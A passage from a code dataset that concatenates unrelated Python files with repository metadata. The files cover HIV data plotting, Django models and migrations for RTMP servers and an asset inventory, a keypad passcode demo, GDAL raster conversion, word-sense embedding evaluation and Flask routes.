| 33.550754 | 130 | 0.623371 | 4,311 | 33,383 | 4.561123 | 0.143586 | 0.014596 | 0.012104 | 0.011392 | 0.342521 | 0.284748 | 0.244927 | 0.219244 | 0.202105 | 0.186747 | 0 | 0.016057 | 0.291076 | 33,383 | 994 | 131 | 33.584507 | 0.814798 | 0.18129 | 0 | 0.198454 | 1 | 0 | 0.100582 | 0.025904 | 0.002577 | 0 | 0 | 0 | 0 | 1 | 0.033505 | false | 0.002577 | 0.054124 | 0 | 0.110825 | 0.139175 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0c6e32f7e7283b6370a0de49f39a51f43f1b82bb | 1,280 | py | Python | HIV model/others.py | omisolaidowu/HIV-story-telling | 290fbb9549ff0177fb2224553575aa24813fdc6a | [
"Apache-2.0"
] | null | null | null | HIV model/others.py | omisolaidowu/HIV-story-telling | 290fbb9549ff0177fb2224553575aa24813fdc6a | [
"Apache-2.0"
] | null | null | null | HIV model/others.py | omisolaidowu/HIV-story-telling | 290fbb9549ff0177fb2224553575aa24813fdc6a | [
"Apache-2.0"
] | null | null | null | '''
-*- coding: utf-8 -*-
Created on Fri Jan 17 12:34:15 2020
@author: Paul
'''
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
df=pd.read_excel(r'C:\Users\Paul\Desktop\Python projects\HIV_3.xlsx')
print(df)
print(df.isnull().sum())
ax=plt.figure(figsize=(8, 8))
years=['2000','2001', '2002', '2003', '2004', '2005', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015', '2016', '2017', '2018']
x=years
print(x)
line=plt.plot
y=df['']
z=df['Number_of_neonatal_deaths']
plt.xlabel('Changes over the years')
plt.ylabel('Occurence by population')
plt.xticks(rotation=90)
line(x,y, 'r', x, z, 'cyan' )
import matplotlib.patches as mpatches
red_patch = mpatches.Patch(color='red', label='New HIV prevalence among youths')
cyan_patch = mpatches.Patch(color='cyan', label='Neonatal deaths')
#blue_patch = mpatches.Patch(color='yellow', label='sIgM+IgG positive')
#orange_patch = mpatches.Patch(color='orange', label='site4')
#brown_patch = mpatches.Patch(color='brown', label='site5')
#black_patch = mpatches.Patch(color='black', label='site6')
plt.legend(handles=[red_patch, cyan_patch], loc=(0, 1))
plt.show()
| 29.767442 | 158 | 0.683594 | 194 | 1,280 | 4.427835 | 0.608247 | 0.090803 | 0.125728 | 0.160652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089029 | 0.13125 | 1,280 | 42 | 159 | 30.47619 | 0.683453 | 0.249219 | 0 | 0 | 0 | 0 | 0.277839 | 0.058434 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0c82f844757360c3545bf98aad68a6f84622e3da | 711 | py | Python | app/core/migrations/0009_auto_20210214_2113.py | Valentin-Golyonko/FlaskTestRPi | b9796a9acb2bb1c122301a3ef192f43c857eb27b | [
"Apache-2.0"
] | null | null | null | app/core/migrations/0009_auto_20210214_2113.py | Valentin-Golyonko/FlaskTestRPi | b9796a9acb2bb1c122301a3ef192f43c857eb27b | [
"Apache-2.0"
] | null | null | null | app/core/migrations/0009_auto_20210214_2113.py | Valentin-Golyonko/FlaskTestRPi | b9796a9acb2bb1c122301a3ef192f43c857eb27b | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.6 on 2021-02-14 18:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0008_auto_20210214_2039'),
]
operations = [
migrations.AlterField(
model_name='device',
name='ip_address',
field=models.GenericIPAddressField(blank=True, help_text='e.g. 192.168.0.17', null=True, verbose_name='IP address'),
),
migrations.AlterField(
model_name='device',
name='mac_address',
field=models.CharField(blank=True, help_text='e.g. A1:B2:C3:D4:5E:6F', max_length=100, null=True, verbose_name='MAC address'),
),
]
| 29.625 | 138 | 0.613221 | 88 | 711 | 4.818182 | 0.647727 | 0.09434 | 0.117925 | 0.136792 | 0.273585 | 0.273585 | 0 | 0 | 0 | 0 | 0 | 0.092105 | 0.251758 | 711 | 23 | 139 | 30.913043 | 0.704887 | 0.063291 | 0 | 0.352941 | 1 | 0 | 0.180723 | 0.034639 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0c85c0c3fc3e88d3d1512b447e6a7c16569279b2 | 1,376 | py | Python | nginx_rtmp_wizard/models.py | Gerhut/nginx-rtmp-wizard | c821c3bb262503ee26408b8b3bf4a252b49a29d6 | [
"Unlicense"
] | null | null | null | nginx_rtmp_wizard/models.py | Gerhut/nginx-rtmp-wizard | c821c3bb262503ee26408b8b3bf4a252b49a29d6 | [
"Unlicense"
] | 1 | 2021-06-10T20:32:59.000Z | 2021-06-10T20:32:59.000Z | nginx_rtmp_wizard/models.py | Gerhut/nginx-rtmp-wizard | c821c3bb262503ee26408b8b3bf4a252b49a29d6 | [
"Unlicense"
] | null | null | null | from django.conf import settings
from django.core import validators
from django.db import models
DEFAULT_RTMP_PORT = 1935
class Server(models.Model):
listen = models.PositiveIntegerField(
default=DEFAULT_RTMP_PORT,
unique=True,
validators=[
validators.MinValueValidator(1024),
validators.MaxValueValidator(65535)
])
def __str__(self):
if self.listen == DEFAULT_RTMP_PORT:
return 'rtmp://{}'.format(settings.RTMP_HOSTNAME)
else:
return 'rtmp://{}:{}'.format(settings.RTMP_HOSTNAME, self.listen)
class Application(models.Model):
server = models.ForeignKey(Server, on_delete=models.CASCADE)
name = models.SlugField(default='live')
live = models.BooleanField(default=False)
def __str__(self):
return '{}/{}'.format(self.server, self.name)
class Meta:
constraints = [
models.UniqueConstraint(
fields=['server', 'name'],
name='unique_server_application_name')]
class Push(models.Model):
application = models.ForeignKey(Application, on_delete=models.CASCADE)
url = models.CharField(
max_length=255,
unique=True,
validators=[
validators.URLValidator(schemes=['rtmp'])
])
def __str__(self):
return 'push {};'.format(self.url)
| 27.52 | 77 | 0.634448 | 140 | 1,376 | 6.05 | 0.385714 | 0.035419 | 0.053129 | 0.070838 | 0.085006 | 0.085006 | 0 | 0 | 0 | 0 | 0 | 0.015474 | 0.248547 | 1,376 | 49 | 78 | 28.081633 | 0.803675 | 0 | 0 | 0.236842 | 0 | 0 | 0.059593 | 0.021802 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078947 | false | 0 | 0.078947 | 0.052632 | 0.526316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
0c914b89127421ea137b1e5268f255c0188586da | 775 | py | Python | contoh_2.py | sumarouno/4x4-Matrix-Keypad-Library-for-CHIP | 42794c3460818714fccc1c5a967e151504ef2ade | [
"MIT"
] | null | null | null | contoh_2.py | sumarouno/4x4-Matrix-Keypad-Library-for-CHIP | 42794c3460818714fccc1c5a967e151504ef2ade | [
"MIT"
] | null | null | null | contoh_2.py | sumarouno/4x4-Matrix-Keypad-Library-for-CHIP | 42794c3460818714fccc1c5a967e151504ef2ade | [
"MIT"
] | null | null | null | #!/usr/bin/python3
from time import sleep
from sys import exit
import keypad_4x4_lib_sumar
kp =keypad_4x4_lib_sumar.keypad()
# Setup variables
attempt = "0000"
passcode = "1912"
counter = 0
# Loop while waiting for a keypress
while True:
# Loop to get a pressed digit
digit = None
while digit == None:
digit = kp.getKey()
# Print the result
print ("Digit Entered: %s"%digit)
attempt = (attempt[1:] + str(digit))
print ("Attempt value: %s"%attempt)
# Check for passcode match
if (attempt == passcode):
print ("Your code was correct, goodbye.")
exit()
else:
counter += 1
print ("Entered digit count: %s"%counter)
if (counter >= 4):
print ("Incorrect code!")
sleep(3)
print ("Try Again")
sleep(1)
counter = 0
sleep(0.5)
| 18.452381 | 43 | 0.658065 | 111 | 775 | 4.540541 | 0.531532 | 0.035714 | 0.047619 | 0.06746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036184 | 0.215484 | 775 | 41 | 44 | 18.902439 | 0.792763 | 0.176774 | 0 | 0.074074 | 0 | 0 | 0.208861 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.074074 | 0.111111 | 0 | 0.111111 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0c9646550e91efca615eedc91a6895d4f88c0e06 | 276 | py | Python | fdk_client/common/date_helper.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | fdk_client/common/date_helper.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | fdk_client/common/date_helper.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | from datetime import datetime
import pytz
from .constants import TIMEZONE
timezone = pytz.timezone(TIMEZONE)
def get_ist_now():
"""Returns Indian Standard Time datetime object.
Returns:
object -- Datetime object
"""
return datetime.now(timezone)
| 16.235294 | 52 | 0.710145 | 32 | 276 | 6.0625 | 0.5 | 0.14433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.213768 | 276 | 16 | 53 | 17.25 | 0.894009 | 0.307971 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.5 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
0c998b3ac75eae9f76dce560875ced69e8123b01 | 6,511 | py | Python | cmdb_v0.1/apps/detail/models.py | codemaker-man/projects | 334aac28b72a7b466fba23df4db11e95df13a3ec | [
"MIT"
] | 1 | 2018-12-05T05:29:46.000Z | 2018-12-05T05:29:46.000Z | cmdb_v0.1/apps/detail/models.py | codemaker-man/projects | 334aac28b72a7b466fba23df4db11e95df13a3ec | [
"MIT"
] | null | null | null | cmdb_v0.1/apps/detail/models.py | codemaker-man/projects | 334aac28b72a7b466fba23df4db11e95df13a3ec | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
from django.db import models
import django.utils.timezone as timezone
# 用户登录信息表(服务器、虚拟机)
class ConnectionInfo(models.Model):
# 用户连接相关信息
ssh_username = models.CharField(max_length=10, default='', verbose_name=u'ssh用户名', null=True)
ssh_userpasswd = models.CharField(max_length=40, default='', verbose_name=u'ssh用户密码', null=True)
ssh_hostip = models.CharField(max_length=40, default='', verbose_name=u'ssh登录的ip', null=True)
ssh_host_port = models.CharField(max_length=10, default='', verbose_name=u'ssh登录的端口', null=True)
ssh_rsa = models.CharField(max_length=64, default='', verbose_name=u'ssh私钥')
rsa_pass = models.CharField(max_length=64, default='', verbose_name=u'私钥的密钥')
# 0-登录失败,1-登录成功
ssh_status = models.IntegerField(default=0, verbose_name=u'用户连接状态,0-登录失败,1-登录成功')
# 1-rsa登录,2-dsa登录,3-普通用户_rsa登录,4-docker成功,5-docker无法登录
ssh_type = models.IntegerField(default=0, verbose_name=u'用户连接类型, 1-rsa登录,2-dsa登录,'
u'3-ssh_rsa登录,4-docker成功,5-docker无法登录')
# 唯一对象标示
sn_key = models.CharField(max_length=256, verbose_name=u"唯一设备ID", default="")
class Meta:
verbose_name = u'用户登录信息表'
verbose_name_plural = verbose_name
db_table = "connectioninfo"
#用户登录信息表(交换机、网络设备)
class NetConnectionInfo(models.Model):
tel_username = models.CharField(max_length=10, default='', verbose_name=u'用户名', null=True)
tel_userpasswd = models.CharField(max_length=40, default='', verbose_name=u'设备用户密码', null=True)
tel_enpasswd = models.CharField(max_length=40, default='', verbose_name=u'设备超级用户密码', null=True)
tel_host_port = models.CharField(max_length=10, default='', verbose_name=u'设备登录的端口', null=True)
tel_hostip = models.CharField(max_length=40, default='', verbose_name=u'设备登录的ip', null=True)
# 0-登录失败,1-登录成功
tel_status = models.IntegerField(default=0, verbose_name=u'用户连接状态,0-登录失败,1-登录成功')
tel_type = models.IntegerField(default=0, verbose_name=u'用户连接类型, 1-普通用户可登录,2-超级用户可登录')
# 唯一对象标示
sn_key = models.CharField(max_length=256, verbose_name=u"唯一设备ID", default="")
dev_info = models.ForeignKey('NetWorkInfo')
class Meta:
verbose_name = u'网络设备用户登录信息'
verbose_name_plural = verbose_name
db_table = "netconnectioninfo"
# 机柜的信息
class CabinetInfo(models.Model):
cab_name = models.CharField(max_length=10, verbose_name=u'机柜编号')
# 1-10分别代表1~10层
cab_lever = models.CharField(max_length=2, verbose_name=u'机器U数,1-10分别代表1~10层')
class Meta:
verbose_name = u'机柜信息表'
verbose_name_plural = verbose_name
db_table = "cabinetinfo"
# 物理服务器信息
class PhysicalServerInfo(models.Model):
# server_name = models.CharField(max_length=15, verbose_name=u'服务器名')
server_ip = models.CharField(max_length=40, verbose_name=u'服务器IP')
# 机器的类型 dell or other?
machine_brand = models.CharField(max_length=60, default='--', verbose_name=u'服务器品牌')
# 机器的类型
# machine_type = models.IntegerField(default=0, verbose_name=u'服务器,0-物理服务器,1-虚拟服务器,2-')
system_ver = models.CharField(max_length=30, default='', verbose_name=u'操作系统版本')
sys_hostname = models.CharField(max_length=15, verbose_name=u'操作系统主机名')
mac = models.CharField(max_length=512, default='', verbose_name=u'MAC地址')
sn = models.CharField(max_length=256, verbose_name=u'SN-主机的唯一标识', default='')
vir_type = models.CharField(max_length=2, verbose_name=u'宿主机类型', default='')
# 物理服务器关联的机柜
ser_cabin = models.ForeignKey('CabinetInfo')
# 用户登录系统信息
conn_phy = models.ForeignKey('ConnectionInfo')
class Meta:
verbose_name = u'物理服务器信息表'
verbose_name_plural = verbose_name
db_table = "physicalserverinfo"
# 虚拟设备信息
class VirtualServerInfo(models.Model):
# server_name = models.CharField(max_length=15, verbose_name=u'服务器名')
server_ip = models.CharField(max_length=40, verbose_name=u'服务器IP')
# 机器的类型 0=kvm,2=虚拟资产,3=网络设备 0=其他类型(未知)
server_type = models.CharField(max_length=80, default='', verbose_name=u'服务器类型:kvm,Vmware,Docker,others')
system_ver = models.CharField(max_length=30, default='', verbose_name=u'操作系统版本')
sys_hostname = models.CharField(max_length=15, verbose_name=u'操作系统主机名')
mac = models.CharField(max_length=512, default='', verbose_name=u'MAC地址')
sn = models.CharField(max_length=256, verbose_name=u'SN-主机的唯一标识', default='')
# 虚拟设备关联的物理服务器
vir_phy = models.ForeignKey('PhysicalServerInfo')
# 用户登录系统信息
conn_vir = models.ForeignKey('ConnectionInfo')
class Meta:
verbose_name = u'虚拟设备表'
verbose_name_plural = verbose_name
db_table = "virtualserverinfo"
# 网络设备表
class NetWorkInfo(models.Model):
host_ip = models.CharField(max_length=40, verbose_name=u'网络设备ip')
host_name = models.CharField(max_length=10, verbose_name=u'网络设备名')
sn = models.CharField(max_length=256, verbose_name=u"SN-设备的唯一标识", default="")
# 网络设备所在的机柜
net_cab = models.ForeignKey('CabinetInfo')
class Meta:
verbose_name = u'网络设备表'
verbose_name_plural = verbose_name
db_table = "networkinfo"
class OtherMachineInfo(models.Model):
ip = models.CharField(max_length=40, verbose_name=u'设备ip')
sn_key = models.CharField(max_length=256, verbose_name=u'设备的唯一标识')
machine_name = models.CharField(max_length=20, verbose_name=u'设备名称')
remark = models.TextField(default='', verbose_name=u'备注')
reson_str = models.CharField(max_length=128,verbose_name=u"归纳原因",default='')
# 关联的机柜
oth_cab = models.ForeignKey('CabinetInfo')
class Meta:
verbose_name = u'其它设备表'
verbose_name_plural = verbose_name
db_table = 'othermachineinfo'
class StatisticsRecord(models.Model):
datatime = models.DateTimeField(verbose_name=u"更新时间",default=timezone.now().strftime('%Y-%m-%d'))
all_count = models.IntegerField(verbose_name=u"所有设备数量",default=0)
pyh_count = models.IntegerField(verbose_name=u"物理设备数量",default=0)
net_count = models.IntegerField(verbose_name=u"网络设备数量",default=0)
other_count = models.IntegerField(verbose_name=u"其他设备数量",default=0)
kvm_count = models.IntegerField(verbose_name=u"KVM设备数量",default=0)
docker_count = models.IntegerField(verbose_name=u"Docker设备数量",default=0)
vmx_count = models.IntegerField(verbose_name=u"VMX设备数量",default=0)
class Meta:
verbose_name = u'扫描后的汇总硬件统计信息'
verbose_name_plural = verbose_name
db_table = 'statisticsrecord'
| 42.835526 | 109 | 0.714176 | 875 | 6,511 | 5.106286 | 0.213714 | 0.184646 | 0.15846 | 0.198747 | 0.649284 | 0.602283 | 0.547449 | 0.484781 | 0.435989 | 0.34624 | 0 | 0.024239 | 0.157272 | 6,511 | 151 | 110 | 43.119205 | 0.790049 | 0.083397 | 0 | 0.285714 | 0 | 0 | 0.119024 | 0.010943 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.040816 | 0.020408 | 0 | 0.744898 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0c9b51976e219b5f5ddeb4bf2182d69d5aa73bdd | 1,202 | py | Python | backend/api/migrations/0002_auto_20210517_0943.py | luxu/django-vue-luxu | a4da215697df578074e354d43dd1d9995490d0db | [
"MIT"
] | null | null | null | backend/api/migrations/0002_auto_20210517_0943.py | luxu/django-vue-luxu | a4da215697df578074e354d43dd1d9995490d0db | [
"MIT"
] | null | null | null | backend/api/migrations/0002_auto_20210517_0943.py | luxu/django-vue-luxu | a4da215697df578074e354d43dd1d9995490d0db | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-05-17 12:43
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Pavilhao',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('numero', models.IntegerField()),
],
),
migrations.AlterField(
model_name='message',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.CreateModel(
name='Sentenciado',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nome', models.CharField(max_length=30)),
('matricula', models.CharField(max_length=50)),
('pavilhao', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.pavilhao')),
],
),
]
| 33.388889 | 117 | 0.578203 | 118 | 1,202 | 5.771186 | 0.474576 | 0.035242 | 0.096916 | 0.127753 | 0.349486 | 0.349486 | 0.349486 | 0.349486 | 0.349486 | 0.349486 | 0 | 0.025671 | 0.287022 | 1,202 | 35 | 118 | 34.342857 | 0.768961 | 0.035774 | 0 | 0.37931 | 1 | 0 | 0.079516 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.068966 | 0 | 0.172414 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0ca263d5ceb8c0df9da68a027a9e2c49d50656ac | 268 | py | Python | data/landice-5g/tiff_to_shp.py | scottsfarley93/IceSheetsViz | f4af84f16af875c5753dca6b8c173c253d9218d4 | [
"MIT"
] | null | null | null | data/landice-5g/tiff_to_shp.py | scottsfarley93/IceSheetsViz | f4af84f16af875c5753dca6b8c173c253d9218d4 | [
"MIT"
] | 1 | 2017-02-28T18:49:04.000Z | 2017-02-28T18:49:55.000Z | data/landice-5g/tiff_to_shp.py | scottsfarley93/IceSheetsViz | f4af84f16af875c5753dca6b8c173c253d9218d4 | [
"MIT"
] | null | null | null | import os
for filename in os.listdir("rasters"):
print filename
f = filename.replace(".tiff", "")
tiff = "rasters/" + filename
out = "shapefiles/" + f + ".shp"
cmd = "gdal_polygonize.py " + tiff + " -f 'ESRI Shapefile' " + out
os.system(cmd)
| 24.363636 | 70 | 0.589552 | 33 | 268 | 4.757576 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.242537 | 268 | 10 | 71 | 26.8 | 0.773399 | 0 | 0 | 0 | 0 | 0 | 0.279851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.125 | null | null | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0ca33e888a8c5506799931e71fe1070bf6588145 | 3,758 | py | Python | we_sensesim.py | y95847frank/GenSense | 0da122bea9b7bd51444748444700b5f788bd8a48 | [
"MIT"
] | 3 | 2018-05-31T05:52:18.000Z | 2019-12-20T07:15:56.000Z | we_sensesim.py | y95847frank/GenSense | 0da122bea9b7bd51444748444700b5f788bd8a48 | [
"MIT"
] | null | null | null | we_sensesim.py | y95847frank/GenSense | 0da122bea9b7bd51444748444700b5f788bd8a48 | [
"MIT"
] | null | null | null | import numpy as np
import sys
import utils
import os
from collections import defaultdict
from nltk.corpus import wordnet as wn
from scipy.spatial.distance import cosine
from scipy.spatial.distance import correlation
from numpy.linalg import norm
from scipy.stats import spearmanr, pearsonr
from utils import trim
import pdb
"""
Sense embedding format: see https://github.com/sjauhar/SenseRetrofit
Use ',' to seperate Datasets
"""
def run(path, fname):
'''
if len(sys.argv) != 3:
print("Usage: python we_sensesim.py SenseEmbedding Datasets")
exit(0)
'''
#wvs = utils.readWordVecs(os.path.expanduser(full_path))
wvs = utils.readWordVecs(sys.argv[1])
print("Finish reading vector!")
wvssen = {}
s_list = defaultdict(list)
for sense in wvs:
wvssen[sense.split("%")[0]] = ''
s_list[sense.split("%")[0]].append(sense)
mean_vector = np.mean(wvs.values(), axis=0)
spear_score_max = []
spear_score_avg = []
f_name = []
for name in fname:
full_path = os.path.join(path, name)
filenames = os.path.expanduser(full_path).split(',')
pairs, scores = utils.readDataset(filenames[0], no_skip=True)
#f_name.append(filenames[0])
#print("Pair number for %s: %d"%(filenames[0], len(pairs)))
coefs_max = []
coefs_avg = []
missing = 0
for pair in pairs:
vecs0 = []
trimed_p0 = trim(pair[0], wvssen)
if trimed_p0 not in wvssen:
vecs0.append(mean_vector)
missing += 1
#print trimed_p0,
else:
for sense in s_list[trimed_p0]:
vecs0.append(wvs[sense])
'''
for sense in wvs:
word = sense.split("%")[0]
if trimed_p0 == word:
vecs0.append(wvs[sense])
'''
vecs1 = []
trimed_p1 = trim(pair[1],wvssen)
if trimed_p1 not in wvssen:
vecs1.append(mean_vector)
missing += 1
#print trimed_p1,
else:
for sense in s_list[trimed_p1]:
vecs1.append(wvs[sense])
'''
for sense in wvs:
word = sense.split("%")[0]
if trimed_p1 == word:
vecs1.append(wvs[sense])
'''
'''
max_value and avg_value: see "Multi-Prototype Vector-Space Models of Word Meaning" section 3.2 Measuring Semantic Similarity
http://www.cs.utexas.edu/~ml/papers/reisinger.naacl-2010.pdf
'''
max_value = max([1-cosine(a,b) for a in vecs0 for b in vecs1])
avg_value = np.mean([1-cosine(a,b) for a in vecs0 for b in vecs1])
coefs_max.append(max_value)
coefs_avg.append(avg_value)
spear_max = spearmanr(scores, coefs_max)
pearson_max = pearsonr(scores, coefs_max)
spear_avg = spearmanr(scores, coefs_avg)
pearson_avg = pearsonr(scores, coefs_avg)
spear_score_max.append(spear_max[0])
spear_score_avg.append(spear_avg[0])
print 'type \t',
for i in range(len(fname)):
print fname[i].split('.')[0],
print '\nspear max\t',
for i in range(len(fname)):
print '%.04f,' % (spear_score_max[i]),
print '\nspear avg\t',
for i in range(len(fname)):
print '%.04f,' % (spear_score_avg[i]),
if __name__ == "__main__":
run('./eval_data', ['EN-MEN-n.txt', 'EN-MEN-l.txt', 'EN-TRUK.txt', 'EN-RW.txt', 'EN-WS353.txt', 'EN-WS353-s.txt', 'EN-WS353-r.txt'])
| 33.256637 | 140 | 0.549228 | 475 | 3,758 | 4.208421 | 0.307368 | 0.030015 | 0.025013 | 0.01951 | 0.245623 | 0.191596 | 0.191596 | 0.131566 | 0.11906 | 0.11906 | 0 | 0.024496 | 0.326503 | 3,758 | 112 | 141 | 33.553571 | 0.76531 | 0.045769 | 0 | 0.101449 | 0 | 0 | 0.065465 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.173913 | null | null | 0.101449 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0cab395492740b9b3d338ab6d9a913dcbe6912e1 | 1,327 | py | Python | src/pages/random.py | jojo935/Kemono2 | bdfaf0ab2dd3c2c4a04805feea8e9fb6193cbd9b | [
"BSD-3-Clause"
] | null | null | null | src/pages/random.py | jojo935/Kemono2 | bdfaf0ab2dd3c2c4a04805feea8e9fb6193cbd9b | [
"BSD-3-Clause"
] | null | null | null | src/pages/random.py | jojo935/Kemono2 | bdfaf0ab2dd3c2c4a04805feea8e9fb6193cbd9b | [
"BSD-3-Clause"
] | null | null | null | from flask import Blueprint, redirect, url_for, g
from ..utils.utils import make_cache_key
from ..internals.cache.redis import get_conn
from ..internals.cache.flask_cache import cache
from ..internals.database.database import get_cursor
from ..lib.artist import get_artist, get_random_artist_keys
from ..lib.post import get_post, get_random_posts_keys
from ..lib.ab_test import get_ab_variant
from ..utils.utils import get_value
import random as rand
random = Blueprint('random', __name__)
@random.route('/posts/random')
def random_post():
post = get_random_post()
if post is None:
return redirect('back')
return redirect(url_for('post.get', service = post['service'], artist_id = post['user'], post_id = post['id']))
@random.route('/artists/random')
def random_artist():
artist = get_random_artist()
if artist is None:
return redirect('back')
return redirect(url_for('artists.get', service = artist['service'], artist_id = artist['id']))
def get_random_post():
post_keys = get_random_posts_keys(1000)
if len(post_keys) == 0:
return None
return rand.choice(post_keys)
def get_random_artist():
artists = get_random_artist_keys(1000)
if len(artists) == 0:
return None
return rand.choice(artists)
| 30.159091 | 116 | 0.699322 | 187 | 1,327 | 4.716578 | 0.245989 | 0.081633 | 0.068027 | 0.045351 | 0.160998 | 0.160998 | 0.099773 | 0.099773 | 0.099773 | 0 | 0 | 0.009294 | 0.189148 | 1,327 | 43 | 117 | 30.860465 | 0.810409 | 0 | 0 | 0.121212 | 0 | 0 | 0.064642 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121212 | false | 0 | 0.30303 | 0 | 0.666667 | 0.060606 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
0cac991dc2d4d32121af9b2da9f1960fba266638 | 917 | py | Python | benchmark_constructor/file_normalizers/ContactSelectFileNormalizer.py | Kortemme-Lab/benchmark_set_construct | ee6c9e097ff49d370936b41f102ada006fb4441a | [
"MIT"
] | null | null | null | benchmark_constructor/file_normalizers/ContactSelectFileNormalizer.py | Kortemme-Lab/benchmark_set_construct | ee6c9e097ff49d370936b41f102ada006fb4441a | [
"MIT"
] | null | null | null | benchmark_constructor/file_normalizers/ContactSelectFileNormalizer.py | Kortemme-Lab/benchmark_set_construct | ee6c9e097ff49d370936b41f102ada006fb4441a | [
"MIT"
] | null | null | null | import os
from .FileNormalizer import FileNormalizer
class ContactSelectFileNormalizer(FileNormalizer):
'''ContactSelectFileNormalizer creates a pymol script that selects
residues which have contacts to asymmetric units.
'''
def __init__(self):
pass
